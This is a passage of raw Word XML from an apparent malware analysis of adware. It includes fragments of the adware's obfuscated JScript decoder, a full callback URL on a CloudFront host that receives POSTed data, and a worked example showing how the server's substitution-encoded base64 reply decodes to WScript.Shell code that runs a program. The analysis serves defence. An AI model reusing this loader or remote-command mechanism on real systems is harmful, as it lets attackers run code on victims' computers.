    <w:p w:rsidR="00D6269D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replac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/[^A-Za-z0-9\+\/\=]/g,"");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h&lt;b.length;)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005277C0" w:rsidRPr="00563EE7" w:rsidRDefault="00D6269D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c=this._keyStr.indexOf(b.charAt(h++)),d=this._keyStr.indexOf(b.charAt(h++)),g=this._keyStr.indexOf(b.charAt(h++)),e=this._keyStr.indexOf(b.charAt(h++)),c=c&lt;&lt;2|d&gt;&gt;4,d=(d&amp;15)&lt;&lt;4|g&gt;&gt;2,f=(g&amp;3)&lt;&lt;6|e,a+=String.fromCharCode(c), 64!=g&amp;&amp;(a+=String.fromCharCode(d)),64!=e&amp;&amp;(a+=String.fromCharCode(f)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t._utf8_decode(a)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_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utf8_encode:function(b){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b=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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replac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/\r\n/g,"\n");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005277C0" w:rsidRPr="00563EE7" w:rsidRDefault="00D6269D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spellStart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,c=0;</w:t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c&lt;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b.length;c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++){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005277C0" w:rsidRPr="00563EE7" w:rsidRDefault="00D6269D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d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charCodeAt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(c); </w:t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128&gt;d?a+=String.fromCharCode(d):(127&lt;d&amp;&amp;2048&gt;d?a+=String.fromCharCode(d&gt;&gt;6|192):(a+=String.fromCharCode(d&gt;&gt;12|224),a+=String.fromCharCode(d&gt;&gt;6&amp;63|128)),a+=String.fromCharCode(d&amp;63|128))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_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utf8_decode:function(b){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D6269D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for(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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="",c=0,d=c1=c2=0;c&lt;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.length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;)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</w:p>
    <w:p w:rsidR="005277C0" w:rsidRPr="00563EE7" w:rsidRDefault="00D6269D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d=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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b.charCodeAt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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(c),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12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8&gt;d?(a+=</w:t>
      </w:r>
      <w:proofErr w:type="spell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String.fromCharCode</w:t>
      </w:r>
      <w:proofErr w:type="spell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(d), </w:t>
      </w:r>
      <w:r w:rsidR="005277C0" w:rsidRPr="00563EE7">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>c++):191&lt;d&amp;&amp;224&gt;d?(c2=b.charCodeAt(c+1),a+=String.fromCharCode((d&amp;31)&lt;&lt;6|c2&amp;63),c+=2):(c2=b.charCodeAt(c+1),c3=b.charCodeAt(c+2),a+=String.fromCharCode((d&amp;15)&lt;&lt;12|(c2&amp;63)&lt;&lt;6|c3&amp;63),c+=3)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retur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a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,n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="";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  <w:t>try{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""),A()&amp;&amp;(!1==x()?e(""):(w(),z()||e(""))),e("")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ab/>
      </w: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catch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B){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</w:t>
      </w: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e("")</w:t>
      </w:r>
      <w:r w:rsidR="00D6269D" w:rsidRPr="00563EE7">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005277C0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  <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr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}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00596CB7" w:rsidRPr="00563EE7" w:rsidRDefault="005277C0" w:rsidP="00C76E4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b/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart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Main(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00563EE7">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00596CB7" w:rsidRDefault="00596CB7" w:rsidP="005C78BE">
      <w:pPr>
        <w:ind w:right="26"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00754ACD" w:rsidRDefault="00754ACD" w:rsidP="005C78BE">
      <w:pPr>
        <w:ind w:right="26"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00596CB7" w:rsidRDefault="00754ACD" w:rsidP="005C78BE">
      <w:pPr>
        <w:ind w:right="26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t xml:space="preserve">This </w:t>
      </w:r>
      <w:r w:rsidR="00F74233">
        <w:t xml:space="preserve">part of the </w:t>
      </w:r>
      <w:r>
        <w:t>script checks for a file named “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00F6542F" w:rsidRPr="00563EE7">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
        </w:rPr>
        <w:t>aowLC</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidR="00F6542F">
        <w:t xml:space="preserve"> in the same folder of the initial script </w:t>
      </w:r>
      <w:r w:rsidR="00F6542F"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="00F6542F" w:rsidRPr="00563EE7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C:\ProgramData</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00F6542F" w:rsidRPr="00563EE7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\{</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00F6542F" w:rsidRPr="00563EE7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66D2A3B1-E</w:t>
      </w:r>
      <w:r w:rsidR="00F6542F" w:rsidRPr="00563EE7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C90-2977-6A56-B735F0143CFB}\</w:t>
      </w:r>
      <w:r w:rsidR="00F6542F"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</w:p>
    <w:p w:rsidR="00972EDC" w:rsidRDefault="00972EDC" w:rsidP="005C78BE">
      <w:pPr>
        <w:ind w:right="26"/>
      </w:pPr>
      <w:r w:rsidRPr="00972EDC">
        <w:t>Only if this file exist a</w:t>
      </w:r>
      <w:r>
        <w:t>nd if it is older than about 10 minutes</w:t>
      </w:r>
      <w:r w:rsidR="00F74233">
        <w:t xml:space="preserve"> (9.16 min to be exactly)</w:t>
      </w:r>
      <w:r w:rsidR="00D2544D">
        <w:t xml:space="preserve"> it will continue by delet</w:t>
      </w:r>
      <w:r>
        <w:t>ing the file and creating a new one (t</w:t>
      </w:r>
      <w:r w:rsidR="00F74233">
        <w:t>hat way the timestamp of the fil</w:t>
      </w:r>
      <w:r>
        <w:t>e is reset to the current time)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00972EDC" w:rsidRDefault="00C92A43" w:rsidP="005C78BE">
      <w:pPr>
        <w:ind w:right="26"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Then it will </w:t>
      </w:r>
      <w:r w:rsidRPr="00AE7F04">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>POST</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> the content of the file </w:t>
      </w:r>
      <w:r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Pr="00F7423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hdat1</w:t>
      </w:r>
      <w:r w:rsidRPr="00B00AF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</w:t>
      </w:r>
      <w:r w:rsidRPr="00C92A43">
        <w:t xml:space="preserve"> to</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> delivered by the parameter at the start of the script</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C92A43" w:rsidRDefault="00C92A43" w:rsidP="005C78BE">
      <w:pPr>
        <w:ind w:right="26"/>
      </w:pPr>
      <w:r>
        <w:t>&lt;URL&gt;+</w:t>
      </w:r>
      <w:r w:rsidR="00145F36">
        <w:t xml:space="preserve">&lt;hex decoded content of </w:t>
      </w:r>
      <w:r w:rsidR="00145F36" w:rsidRPr="00F74233">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>hdat2</w:t>
      </w:r>
      <w:r w:rsidR="00145F36">
        <w:t>&gt;</w:t>
      </w:r>
      <w:r>
        <w:t>+</w:t>
      </w:r>
      <w:r w:rsidR="00145F36">
        <w:t>”&amp;r=”+</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00145F36" w:rsidRDefault="00F74233" w:rsidP="005C78BE">
      <w:pPr>
        <w:ind w:right="26"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidR="00145F36" w:rsidRPr="00F74233">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>hdat2</w:t>
      </w:r>
      <w:r w:rsidR="00145F36">
        <w:t xml:space="preserve"> content </w:t>
      </w:r>
      <w:r w:rsidR="00AE7F04">
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidR="00145F36">
        <w:t xml:space="preserve"> “</w:t>
      </w:r>
      <w:r w:rsidR="00145F36" w:rsidRPr="00563EE7">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
        </w:rPr>
        <w:t>3f763d322e3226706372633d313434383133333539372672763d342e30</w:t>
      </w:r>
      <w:r w:rsidR="00145F36">
        <w:t xml:space="preserve">” </w:t>
      </w:r>
      <w:r w:rsidR="00AE7F04">
        <w:br/>
        <w:t xml:space="preserve">converting this to ASCII results in </w:t>
      </w:r>
      <w:r w:rsidR="00145F36" w:rsidRPr="00563EE7">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00145F36" w:rsidRPr="00563EE7">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
        </w:rPr>
        <w:t>?v</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00145F36" w:rsidRPr="00563EE7">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
        </w:rPr>
        <w:t>=2.2&amp;pcrc=1448133597&amp;rv=4.0</w:t>
      </w:r>
      <w:r w:rsidR="00145F36">
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AE7F04" w:rsidRDefault="00F74233" w:rsidP="005C78BE">
      <w:pPr>
        <w:ind w:right="26"/>
      </w:pPr>
      <w:r>
        <w:t>So for this example the full</w:t>
      </w:r>
      <w:r w:rsidR="00AE7F04">
        <w:t xml:space="preserve"> URL is:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C92A43" w:rsidRPr="00AE7F04" w:rsidRDefault="00145F36" w:rsidP="005C78BE">
      <w:pPr>
        <w:ind w:right="26"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AE7F04">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>"https://d2wv7denc1jx9z.cloudfront.net/?v=2.2&amp;pcrc=1448133597&amp;rv=4.0&amp;r=1"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009A20E4" w:rsidRDefault="00AE7F04" w:rsidP="006F6CA6">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r w:rsidRPr="00AE7F04">
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r>
        <w:t>return value usually is “</w:t>
      </w:r>
      <w:r w:rsidR="000A30E0" w:rsidRPr="00F74233">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidR="000A30E0">
        <w:t xml:space="preserve"> (which </w:t>
      </w:r>
      <w:r w:rsidR="00F74233">
        <w:t xml:space="preserve">is </w:t>
      </w:r>
      <w:r w:rsidR="000A30E0">
        <w:t xml:space="preserve">harmless) </w:t>
      </w:r>
      <w:r w:rsidR="000A30E0" w:rsidRPr="006F6CA6">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>BUT</w:t>
      </w:r>
      <w:r w:rsidR="000A30E0">
        <w:t xml:space="preserve"> the adware admins can provide </w:t>
      </w:r>
      <w:r w:rsidR="006F6CA6">
        <w:t xml:space="preserve">whatever </w:t>
      </w:r>
      <w:r w:rsidR="000A30E0">
        <w:t xml:space="preserve">commands to the victims </w:t>
      </w:r>
      <w:r w:rsidR="006F6CA6">
        <w:t xml:space="preserve">computer </w:t>
      </w:r>
      <w:r w:rsidR="000A30E0">
        <w:t>via the output of this URL.</w:t>
      </w:r>
      <w:r w:rsidR="006F6CA6">
        <w:br/>
      </w:r>
      <w:r w:rsidR="000A30E0">
        <w:t>Th</w:t>
      </w:r>
      <w:r w:rsidR="00F74233">
        <w:t xml:space="preserve">ese commands are passed </w:t>
      </w:r>
      <w:r w:rsidR="000A30E0">
        <w:t xml:space="preserve">via an encrypted </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="000A30E0">
        <w:t>jscript</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="000A30E0">
        <w:t xml:space="preserve"> function</w:t>
      </w:r>
      <w:r w:rsidR="006F6CA6">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="006F6CA6">
        <w:br/>
      </w:r>
      <w:r w:rsidR="00F74233">
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidR="006F6CA6">
        <w:t>he function is provided via a base64 string which first needs to be decoded via character substitution using the following decoding table that inverses the characters of the alphabet &amp; numbers:</w:t>
      </w:r>
      <w:r w:rsidR="009A20E4">
        <w:br/>
      </w:r>
    </w:p>
    <w:p w:rsidR="006F6CA6" w:rsidRPr="00563EE7" w:rsidRDefault="006F6CA6" w:rsidP="009A20E4">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:szCs w:val="16"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00563EE7">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:szCs w:val="16"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>"ZYXWVUTSRQPONMLKJIHGFEDCBAzyxwvutsrqponmlkjihgfedcba9876543210+/="</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006F6CA6" w:rsidRPr="00563EE7" w:rsidRDefault="006F6CA6" w:rsidP="009A20E4">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:szCs w:val="16"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00563EE7">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:szCs w:val="16"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> |||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009A20E4" w:rsidRDefault="006F6CA6" w:rsidP="009A20E4">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00563EE7">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:szCs w:val="16"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/="</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009A20E4" w:rsidRDefault="009A20E4" w:rsidP="009E479D">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F74233" w:rsidRDefault="006F6CA6" w:rsidP="009E479D">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00F74233">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00F74233">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00F74233">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AE7F04" w:rsidRPr="00AE7F04" w:rsidRDefault="009A20E4" w:rsidP="009E479D">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r w:rsidRPr="009A20E4">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>E</w:t>
      </w:r>
      <w:r w:rsidR="009E479D" w:rsidRPr="009A20E4">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>xample:</w:t>
      </w:r>
      <w:r w:rsidR="009E479D">
        <w:t xml:space="preserve"> if the adware admins would return following string it </w:t>
      </w:r>
      <w:r w:rsidR="009E479D" w:rsidRPr="009E479D">
        <w:t xml:space="preserve">will start up </w:t>
      </w:r>
      <w:r w:rsidR="00F74233">
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidR="009E479D" w:rsidRPr="009E479D">
        <w:t>notepad</w:t>
      </w:r>
      <w:r w:rsidR="00F74233">
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009A20E4" w:rsidRDefault="009A20E4" w:rsidP="009E479D">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:szCs w:val="16"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009E479D" w:rsidRDefault="009E479D" w:rsidP="009E479D">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r w:rsidRPr="009E479D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:szCs w:val="16"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidRPr="009E479D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:szCs w:val="16"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>AmEfB6Iky75tvn8szD5lPChtwnUbRSN0E8MqxnodwWhtvW8CF7MbzCY9OpMbADU9AF0rznEqwXtrE8MqxnodwX4GzTEhyXRkLbY5OoQ8yrtryn09ACYsAX4ovTFrPGhtuHY3yDUkyrtkLd==</w:t>
      </w:r>
      <w:r w:rsidRPr="009E479D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:szCs w:val="16"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:szCs w:val="16"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w:rsidR="009E479D" w:rsidRDefault="009E479D" w:rsidP="009E479D">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Substituting this base64 string end then decoding it gives you the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>jscript</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> code to start notepad</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009A20E4" w:rsidRDefault="009A20E4" w:rsidP="005C78BE">
      <w:pPr>
        <w:ind w:right="26"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:szCs w:val="16"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AE7F04" w:rsidRPr="009E479D" w:rsidRDefault="009E479D" w:rsidP="005C78BE">
      <w:pPr>
        <w:ind w:right="26"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009E479D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:szCs w:val="16"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00563EE7">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:szCs w:val="16"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>function</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00563EE7">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:szCs w:val="16"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> 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zmain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 xml:space="preserve">(){ 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var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 xml:space="preserve"> s=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WScript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>; x=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WScript.CreateObject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>("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WScript.Shell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 xml:space="preserve">"); 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x.Run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 xml:space="preserve">("notepad.exe"); } </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00563EE7">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:szCs w:val="16"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>zmain</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00563EE7">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:szCs w:val="16"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
      <w:r w:rsidRPr="009E479D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:szCs w:val="16"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AE7F04" w:rsidRDefault="00AE7F04" w:rsidP="005C78BE">
      <w:pPr>
        <w:ind w:right="26"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009E479D" w:rsidRPr="00AE7F04" w:rsidRDefault="009E479D" w:rsidP="005C78BE">
      <w:pPr>
        <w:ind w:right="26"/>
      </w:pPr>
      <w:r>
        <w:t>Hackers with bad intentions c</w:t>
      </w:r>
      <w:r w:rsidR="009F5DD3">
        <w:t>an</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> easily abuse this </w:t>
      </w:r>
      <w:r w:rsidR="00F74233">
        <w:t xml:space="preserve">adware </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">to pass their code to the </w:t>
      </w:r>
      <w:r w:rsidR="00BC3AEA">
        <w:t>victim’s</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> computers.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AE7F04" w:rsidRDefault="00AE7F04" w:rsidP="005C78BE">
      <w:pPr>
        <w:ind w:right="26"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B61C9A" w:rsidRPr="00BC3AEA" w:rsidRDefault="00F842CB" w:rsidP="005C78BE">
      <w:pPr>
        <w:ind w:right="26"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC3AEA">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Commonly comes along with:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F842CB" w:rsidRPr="00BC3AEA" w:rsidRDefault="00526E6D" w:rsidP="00F842CB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:ind w:right="26"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC3AEA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>FileZilla</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F842CB" w:rsidRPr="00BC3AEA" w:rsidRDefault="00F842CB" w:rsidP="00F842CB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:ind w:right="26"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC3AEA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>Chromium</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F842CB" w:rsidRPr="00BC3AEA" w:rsidRDefault="00F842CB" w:rsidP="00F842CB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:ind w:right="26"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC3AEA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>Multiple Video converters</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00526E6D" w:rsidRPr="00BC3AEA" w:rsidRDefault="00526E6D" w:rsidP="00F842CB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:ind w:right="26"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BC3AEA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>ByteFence</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00F842CB" w:rsidRPr="00BC3AEA" w:rsidRDefault="00F842CB" w:rsidP="00F842CB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:ind w:right="26"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC3AEA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>…</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F842CB" w:rsidRDefault="00F842CB" w:rsidP="005C78BE">
      <w:pPr>
        <w:ind w:right="26"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B61C9A" w:rsidRPr="00BC3AEA" w:rsidRDefault="00B61C9A" w:rsidP="005C78BE">
      <w:pPr>
        <w:ind w:right="26"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC3AEA">
        <w:rPr>
          <w:b/>
        </w:rPr>
